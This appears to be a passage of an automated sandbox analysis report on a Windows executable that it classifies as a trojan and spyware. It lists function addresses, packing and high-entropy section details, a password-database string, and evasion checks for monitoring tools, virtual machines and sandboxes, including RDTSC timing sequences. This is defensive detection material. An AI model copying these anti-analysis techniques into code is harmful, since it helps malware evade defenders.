Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DF6F44	0_2_00DF6F44
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E98F5F	0_2_00E98F5F
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E4AF53	0_2_00E4AF53
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E74F5A	0_2_00E74F5A
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DF2F1C	0_2_00DF2F1C
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E3CF20	0_2_00E3CF20
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E92F2A	0_2_00E92F2A
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DD2F1A	0_2_00DD2F1A
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E14F2F	0_2_00E14F2F
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E6EF32	0_2_00E6EF32
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E690E4	0_2_00E690E4
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00ED90EB	0_2_00ED90EB
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E230F5	0_2_00E230F5
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DE90C7	0_2_00DE90C7
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DF50C1	0_2_00DF50C1
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DA90EF	0_2_00DA90EF
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E010DB	0_2_00E010DB
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E9F0BE	0_2_00E9F0BE
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00EB70B7	0_2_00EB70B7
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DDF0B4	0_2_00DDF0B4
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E7308C	0_2_00E7308C
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E1509E	0_2_00E1509E
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E09067	0_2_00E09067
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E13073	0_2_00E13073
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00D61040	0_2_00D61040
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E8D075	0_2_00E8D075
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00EBB075	0_2_00EBB075
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00EF5070	0_2_00EF5070
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E77047	0_2_00E77047
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E99049	0_2_00E99049
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E55044	0_2_00E55044
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E8B043	0_2_00E8B043
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00EA7023	0_2_00EA7023
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00D67006	0_2_00D67006
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E79037	0_2_00E79037
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E49037	0_2_00E49037
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E8500A	0_2_00E8500A
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00D69030	0_2_00D69030
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E2900A	0_2_00E2900A
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00EC5004	0_2_00EC5004
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00D911DA	0_2_00D911DA
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DED1DB	0_2_00DED1DB
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00EBF1E7	0_2_00EBF1E7
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00EC31F7	0_2_00EC31F7
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E531C4	0_2_00E531C4
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E7F1C1	0_2_00E7F1C1
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E3F1CE	0_2_00E3F1CE
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00EC11C1	0_2_00EC11C1
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E951DA	0_2_00E951DA
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E431A2	0_2_00E431A2
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E2F1AA	0_2_00E2F1AA
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DFB193	0_2_00DFB193
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DD71B4	0_2_00DD71B4
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DE71B3	0_2_00DE71B3
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E0D163	0_2_00E0D163
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E27165	0_2_00E27165
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E61177	0_2_00E61177
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E1117E	0_2_00E1117E
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E67150	0_2_00E67150
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E2515B	0_2_00E2515B
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DA5160	0_2_00DA5160
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E4512E	0_2_00E4512E
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00EAB13D	0_2_00EAB13D
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00EAD100	0_2_00EAD100
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E1B10F	0_2_00E1B10F
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00EC7110	0_2_00EC7110
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E2F2E8	0_2_00E2F2E8
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E5D2C1	0_2_00E5D2C1
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00D6D2F0	0_2_00D6D2F0
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00EA32C6	0_2_00EA32C6
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E332D1	0_2_00E332D1
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00EBB2D8	0_2_00EBB2D8
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E0B2D4	0_2_00E0B2D4
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DD5295	0_2_00DD5295
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E3B2AB	0_2_00E3B2AB
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E312A8	0_2_00E312A8
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E592B5	0_2_00E592B5
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DE128A	0_2_00DE128A
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00D892A0	0_2_00D892A0
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E05261	0_2_00E05261
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E47265	0_2_00E47265
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E9F261	0_2_00E9F261
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DA3250	0_2_00DA3250
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E1D26D	0_2_00E1D26D
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00EAF278	0_2_00EAF278
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E8723A	0_2_00E8723A
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DCF206	0_2_00DCF206
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00D9B238	0_2_00D9B238
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00EA1211	0_2_00EA1211
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E8F3EE	0_2_00E8F3EE
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E973F0	0_2_00E973F0
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E6D3FA	0_2_00E6D3FA
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DFD3EE	0_2_00DFD3EE
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E693D7	0_2_00E693D7
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00ED33D9	0_2_00ED33D9
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00ED73D3	0_2_00ED73D3
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DE73E1	0_2_00DE73E1
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DA5390	0_2_00DA5390

Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: String function: 00D7A420 appears 110 times
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: String function: 00D6B380 appears 49 times

Source: FvbuInU.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: FvbuInU.exe

Static PE information: Section: kzbupdkl ZLIB complexity 0.9941578305361483

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@2/2

Source: C:\Users\user\Desktop\FvbuInU.exe

Code function: 0_2_00D98AC0 CoCreateInstance,

0_2_00D98AC0

Source: C:\Users\user\Desktop\FvbuInU.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: FvbuInU.exe, 00000000.00000003.1420364272.0000000005CAF000.00000004.00000800.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1420540032.0000000005CA4000.00000004.00000800.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1362376294.0000000005CB7000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: FvbuInU.exe	Virustotal: Detection: 76%
Source: FvbuInU.exe	ReversingLabs: Detection: 76%

Source: FvbuInU.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\FvbuInU.exe

File read: C:\Users\user\Desktop\FvbuInU.exe

Jump to behavior

Source: C:\Users\user\Desktop\FvbuInU.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: FvbuInU.exe

Static file information: File size 2090496 > 1048576

Source: FvbuInU.exe

Static PE information: Raw size of kzbupdkl is bigger than: 0x100000 < 0x19b800

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\FvbuInU.exe

Unpacked PE file: 0.2.FvbuInU.exe.d60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kzbupdkl:EW;bmqfvobi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;kzbupdkl:EW;bmqfvobi:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: FvbuInU.exe

Static PE information: real checksum: 0x20b4c1 should be: 0x202360

Source: FvbuInU.exe	Static PE information: section name:
Source: FvbuInU.exe	Static PE information: section name: .idata
Source: FvbuInU.exe	Static PE information: section name:
Source: FvbuInU.exe	Static PE information: section name: kzbupdkl
Source: FvbuInU.exe	Static PE information: section name: bmqfvobi
Source: FvbuInU.exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DCC0E9 push ebx; mov dword ptr [esp], edx	0_2_00DCC10C
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00F4A0C2 push ebp; mov dword ptr [esp], ebx	0_2_00F4A0C6
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DC60A6 push ebp; mov dword ptr [esp], edx	0_2_00DC6BC0
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DC405C push edi; mov dword ptr [esp], ebp	0_2_00DC4034
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DC405C push ebx; mov dword ptr [esp], 015C7BB9h	0_2_00DC4061
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DC8042 push ecx; mov dword ptr [esp], esp	0_2_00DC9B05
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DC4003 push ecx; mov dword ptr [esp], 41EAC3CBh	0_2_00DC4421
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00FA8010 push 35F87757h; mov dword ptr [esp], edx	0_2_00FA8038
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00FA8010 push edx; mov dword ptr [esp], 66EEA147h	0_2_00FA8057
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DEE024 push 3C78792Eh; mov dword ptr [esp], edx	0_2_00DEE371
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DEE024 push eax; mov dword ptr [esp], 2972F28Eh	0_2_00DEE440
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DEE024 push edx; mov dword ptr [esp], ecx	0_2_00DEE461
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DEE024 push 233F525Dh; mov dword ptr [esp], edx	0_2_00DEE4E7
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DC81DC push eax; mov dword ptr [esp], edx	0_2_00DCA89D
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00F301FA push edx; mov dword ptr [esp], esp	0_2_00F301FF
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00F301FA push 4411D8F7h; mov dword ptr [esp], edi	0_2_00F3020F
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00F301FA push 57C0EF00h; mov dword ptr [esp], ebx	0_2_00F30258
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00F301FA push 70FDEC61h; mov dword ptr [esp], esi	0_2_00F30286
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00F301FA push 2FC70388h; mov dword ptr [esp], edx	0_2_00F302DC
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00F301FA push 44BE5247h; mov dword ptr [esp], ecx	0_2_00F30307
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00F301FA push esi; mov dword ptr [esp], eax	0_2_00F30347
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00F301FA push edx; mov dword ptr [esp], 2E63A62Ah	0_2_00F303D1
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00F301FA push edi; mov dword ptr [esp], eax	0_2_00F3045E
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00F301FA push ebp; mov dword ptr [esp], 5FAFBE57h	0_2_00F3048C
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00F301FA push edi; mov dword ptr [esp], edx	0_2_00F30502
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00F301FA push 507B9100h; mov dword ptr [esp], ecx	0_2_00F306A2
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00F301FA push eax; mov dword ptr [esp], esp	0_2_00F306A6
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00F301FA push 79A5CBC0h; mov dword ptr [esp], ebp	0_2_00F30789
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00F301FA push esi; mov dword ptr [esp], 7CF77140h	0_2_00F30852
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00F301FA push 09FAF274h; mov dword ptr [esp], ecx	0_2_00F3090D
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00F301FA push esi; mov dword ptr [esp], 525D749Bh	0_2_00F309AA

Source: FvbuInU.exe	Static PE information: section name: entropy: 7.20142058220356
Source: FvbuInU.exe	Static PE information: section name: kzbupdkl entropy: 7.952571902495584

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\FvbuInU.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\FvbuInU.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\FvbuInU.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\FvbuInU.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\FvbuInU.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: DC59A7 second address: DC59BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jc 00007F8E8511F5E8h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: DC59BC second address: DC59C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: DC59C0 second address: DC59C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F3CD79 second address: F3CD7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F3C2E4 second address: F3C2E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F3C2E8 second address: F3C302 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E84B4EF81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F3C5E8 second address: F3C5F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F3F95A second address: F3F960 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F3F960 second address: F3F9A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 2E83F22Eh 0x0000000f mov esi, dword ptr [ebp+122D36A5h] 0x00000015 add dword ptr [ebp+122D1B56h], eax 0x0000001b push 00000003h 0x0000001d mov dword ptr [ebp+122D1A50h], esi 0x00000023 push 00000000h 0x00000025 push esi 0x00000026 mov ch, 7Dh 0x00000028 pop edi 0x00000029 push 00000003h 0x0000002b add dx, 6331h 0x00000030 jmp 00007F8E8511F5DFh 0x00000035 push 7E9705A9h 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F3F9A9 second address: F3F9AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F3F9AD second address: F3F9B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F50F4A second address: F50F50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F60A30 second address: F60A35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F5E8C0 second address: F5E8CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F5E8CA second address: F5E8DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E8511F5DEh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F5E8DD second address: F5E8FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnc 00007F8E84B4EF76h 0x0000000b jo 00007F8E84B4EF76h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 push edi 0x0000001a pop edi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F5E8FA second address: F5E8FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F5E8FE second address: F5E911 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E84B4EF7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F5E911 second address: F5E91D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
